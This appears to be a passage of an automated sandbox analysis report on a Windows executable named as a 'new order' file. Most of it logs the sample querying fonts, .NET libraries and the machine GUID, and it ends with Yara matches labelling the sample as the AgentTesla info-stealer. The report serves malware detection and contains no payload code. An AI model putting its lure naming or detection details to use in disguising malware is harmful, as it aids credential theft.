                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.3922928.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.38ecb08.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.38ecb08.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.3806288.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000000.282084634.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.283151659.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.290045970.0000000003769000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.517392444.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.284209429.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.284592595.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.523008375.0000000002DB1000.00000004.00000001.sdmp, type: MEMORY
